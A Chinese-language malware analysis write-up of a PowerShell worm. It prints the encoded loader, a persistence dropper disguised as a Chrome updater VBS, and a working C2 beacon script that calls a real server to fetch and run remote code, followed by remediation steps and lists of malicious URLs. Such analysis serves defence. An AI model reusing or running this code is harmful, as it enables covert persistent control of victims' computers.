306176,329472,326144,306176,329472,332800,306176,329472,342784,306176,346112,319488,306176,346112,332800,306176,329472,342784,306176,329472,332800,306176,332800,332800,306176,329472,326144,306176,332800,346112,296192,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,279552,439296,482560,539136,502528,495872,545792,425984,482560,545792,505856,266240,362752,266240,462592,435968,562432,542464,545792,495872,522496,312832,402688,422656,312832,425984,482560,545792,505856,469248,352768,352768,396032,495872,545792,439296,495872,522496,532480,425984,482560,545792,505856,292864,296192,266240,302848,266240,279552,425984,542464,392704,509184,519168,495872,419328,482560,522496,495872,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,435968,562432,542464,545792,495872,522496,312832,402688,422656,312832,392704,509184,519168,495872,469248,352768,352768,449280,539136,509184,545792,495872,376064,519168,519168,439296,495872,559104,545792,292864,279552,439296,482560,539136,502528,495872,545792,425984,482560,545792,505856,306176,266240,279552,376064,462592,322816,469248,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,435968,562432,542464,545792,495872,522496,312832,402688,422656,312832,392704,509184,519168,495872,469248,352768,352768,449280,539136,509184,545792,495872,376064,519168,519168,439296,495872,559104,545792,292864,462592,435968,562432,542464,545792,495872,522496,312832,389376,525824,552448,509184,539136,529152,525824,522496,495872,525824,545792,469248,352768,352768,396032,495872,545792,392704,529152,519168,492544,495872,539136,425984,482560,545792,505856,292864,342784,296192,266240,302848,266240,272896,465920,449280,509184,525824,412672,422656,396032,422656,419328,442624,532480,492544,482560,545792,495872,312832,552448,485888,542464,272896,306176,266240,279552,435968,545792,482560,539136,545792,549120,532480,382720,529152,525824,545792,495872,525824,545792,312832,432640,495872,532480,519168,482560,489216,495872,292864,272896,282880,425984,439296,282880,272896,306176,266240,279552,439296,482560,539136,502528,495872,545792,425984,482560,545792,505856,296192,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,425984,529152,555776,495872,539136,435968,505856,495872,519168,519168,312832,495872,559104,495872,266240,309504,449280,509184,525824,492544,529152,555776,435968,545792,562432,519168,495872,266240,399360,509184,492544,492544,495872,525824,266240,309504,389376,559104,495872,489216,549120,545792,509184,529152,525824,425984,529152,519168,509184,489216,562432,266240,432640,495872,522496,529152,545792,495872,435968,509184,502528,525824,495872,492544,266240,309504,392704,509184,519168,495872,266240,279552,439296,482560,539136,502528,495872,545792,425984,482560,545792,505856,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,485888,539136,495872,482560,515840,266240,575744,203008,193024,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,289536,382720,519168,289536,266240,569088,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,389376,525824,552448,509184,539136,529152,525824,522496,495872,525824,545792,469248,352768,352768,389376,559104,509184,545792,292864,319488,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,485888,539136,495872,482560,515840,266240,575744,203008,193024,189696,203008,193024,189696,289536,442624,525824,289536,266240,569088,203008,193024,189696,266240,266240,266240,266240,462592,389376,525824,552448,509184,539136,529152,525824,522496,495872,525824,545792,469248,352768,352768,389376,559104,509184,545792,292864,319488,296192,203008,193024,189696,485888,539136,495872,482560,515840,266240,575744,203008,193024,266240,266240,266240,266240,575744,203008,193024,266240,266240,266240,266240,435968,545792,482560,539136,545792,309504,435968,519168,495872,495872,532480,266240,309504,416000,509184,519168,519168,509184,542464,495872,489216,529152,525824,492544,542464,266240,329472,319488,319488,319488,203008,193024,575744)
[String] $PDF = [System.Text.UTF8Encoding]::UTF8.GetString((IntegerToBytes $rawData '00125495565210225012546982'))
Invoke-Expression $PDF
自啟動
第二層轉譯
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName Microsoft.VisualBasic
function DropToStartup() {
[String] $startup = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,79,66,66,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,79,66,66,46,82,117,110,32,34,80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,34,43,34,37,70,73,76,69,37,34,44,48))
[System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + '\GoogleChromeUpdateHandlerx64.vbs', $startup.Replace('%FILE%', $PSCommandPath))
}
DropToStartup
將代碼
Set OBB = CreateObject("WScript.Shell")
OBB.Run "PowerShell -ExecutionPolicy RemoteSigned -File "+"C:\Users\Administrator\Desktop\worm_server.ps1",0
寫入路徑
C:\Users\Hk_Mayfly\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChromeUpdateHandlerx64.vbs,即設置為自啟動
C2控制腳本
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName Microsoft.VisualBasic
[Object] $HTTP_OBJECT = [Microsoft.VisualBasic.Interaction]::CreateObject('MSXML2.XMLHTTP')
[String] $IP = '185.81.157.136'
[String] $Port = '3681'
[String] $Splitter = '|V|'
$ErrorActionPreference = 'SilentlyContinue'
function DropToStartup() {
[String] $startup = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,79,66,66,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,79,66,66,46,82,117,110,32,34,80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,34,43,34,37,70,73,76,69,37,34,44,48))
[System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + '\GoogleChromeUpdateHandler.vbs', $startup.Replace('%FILE%', $PSCommandPath))
}
Function HTTP($DA, $Param) {
[String] $Response = [String]::Empty
try
{
$HTTP_OBJECT.Open('POST', 'http://' + $IP + ':' + $Port + '/' + $DA, $false)
$HTTP_OBJECT.SetRequestHeader('User-Agent:', $INFO)
$HTTP_OBJECT.Send($Param)
$Response = [Convert]::ToString($HTTP_OBJECT.ResponseText)
} catch { }
return $Response
}
Function INF {
[String] $MAC = HWID($env:computername)
[String] $ID = 'Novo_' + $MAC
[String] $VER = 'v0.2'
[String] $OS = [Microsoft.VisualBasic.Strings]::Split((Get-WMIObject win32_operatingsystem).name,"|")[0] + " " + (Get-WmiObject Win32_OperatingSystem).OSArchitecture
[String] $AV = 'Windows Defender'
return $ID + "\" + ($env:COMPUTERNAME) + "\" + ($env:UserName) + "\" + $OS + "\" + $AV + "\" + "Yes" + "\" + "Yes" + "\" + "FALSE" + "\"
}
Function HWID($strComputer) {
$ErrorActionPreference = 'SilentlyContinue'
$lol = [System.Convert]::ToString((get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID))
return ([Microsoft.VisualBasic.Strings]::Split($lol,'-')[0] + [Microsoft.VisualBasic.Strings]::Split($lol,'-')[1])
}
DropToStartup
[String] $INFO = INF
while($true)
{
$A = [Microsoft.VisualBasic.Strings]::Split((HTTP("Vre", "")) , $Splitter)
switch($A[0]) {
'TR' {
[String] $PsFileName = [System.Guid]::NewGuid().ToString().Replace("-", "") + ".PS1"
[String] $StartupContent = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,87,115,104,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,87,115,104,83,104,101,108,108,46,82,117,110,32,34,80,111,119,101,114,115,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,70,105,108,101,32,34,32,43,32,34,37,80,84,37,34,44,32,48))
$TargetPath = [System.IO.Path]::GetTempPath() + $PsFileName
[System.IO.File]::WriteAllText($TargetPath, $A[1])
[System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + "\WinLOGONUpdate.vbs", $StartupContent.Replace("%PT%", $TargetPath))
PowerShell.exe -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File $TargetPath
break }
'Cl' {
[Environment]::Exit(0)
break }
'Un' {
[Environment]::Exit(0)
break }
}
Start-Sleep -Milliseconds 3000
}
每3秒向服務器http://185.81.157.136:3681/Vre發起請求,并會將感染機信息放入User-Agent字段,以POST請求發送到服務器。類似:
{User-Agent:Novo_\DESKTOP-KQH6LSB\Hk_Mayfly\Microsoft Windows 10 專業版 64 位\Windows Defender\Yes\Yes\FALSE\} 同時,遠程服務器返回信息控制感染機:
指令代碼含義TR下載遠程惡意代碼執行Cl終止惡意進程Un終止惡意進程
執行TR命令時:
- 會將遠程惡意文件下載到臨時目錄
- C:\Users\Hk_Mayfly\AppData\Local\Temp\4af4ccd7024e4982ae61202d8926e0bf.PS1,將惡意文件路徑寫入到C:\Users\Hk_Mayfly\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinLOGONUpdate.vbs,設為自啟動,并執行命令WshShell.Run "Powershell -ExecutionPolicy Bypass -File " + "C:\Users\Hk_Mayfly\AppData\Local\Temp\4af4ccd7024e4982ae61202d8926e0bf.PS1", 0啟動惡意文件。樣本行為有點類似紫狐病毒了~
總結
修復建議:
- 清除臨時目錄下的{hash}.PS1文件
- 清除自啟動目錄下的
- WinLOGONUpdate.vbs和GoogleChromeUpdateHandlerx64.vbs文件
IOC信息:
6b9b98ab790280f0ae64ac2b30ee8220 http://2.56.57.82/1/1.txt http://2.56.57.82/1/SystemLogin.txt http://2.56.57.82/1/Win10.txt http://185.81.157.136:3681/Vre 其它 http://blackid-42311.portmap.host:7974/Vre http://janda.publicvm.com:1005/Vre http://severdops.ddns.net:5050/Vre
C段中還發現了其他惡意URL:
http://2.56.57.181/ordine_STAR_PROGETTI_Uupepfct.jpg http://2.56.57.187/moo/m00r4i.arm http://2.56.57.187/moo/m00r4i.arm5 http://2.56.57.187/moo/m00r4i.arm6 http://2.56.57.187/moo/m00r4i.arm7 http://2.56.57.187/moo/m00r4i.m68k http://2.56.57.187/moo/m00r4i.mips http://2.56.57.187/moo/m00r4i.mpsl http://2.56.57.187/moo/m00r4i.ppc http://2.56.57.187/moo/m00r4i.sh4 http://2.56.57.187/moo/m00r4i.spc http://2.56.57.187/moo/m00r4i.x86 http://2.56.57.49/LjEZs/uYtea.arm http://2.56.57.49/LjEZs/uYtea.arm5 http://2.56.57.49/LjEZs/uYtea.arm6 http://2.56.57.49/LjEZs/uYtea.m68k http://2.56.57.49/LjEZs/uYtea.mpsl http://2.56.57.49/LjEZs/uYtea.ppc http://2.56.57.49/LjEZs/uYtea.spc http://2.56.57.49/LjEZs/uYtea.x86 http://2.56.57.49/LjEZs/uYtea.x86_64 http://2.56.57.49/arm5 http://2.56.57.49/arm6 http://2.56.57.49/arm7 http://2.56.57.49/m68k http://2.56.57.49/mips http://2.56.57.49/mpsl http://2.56.57.49/x86 http://2.56.57.98/arm http://2.56.57.98/hahahaha.sh http://2.56.57.98/i686 http://2.56.57.98/mipsel http://2.56.57.98/sh4 http://2.56.57.98/sparc
VSole
網絡安全專家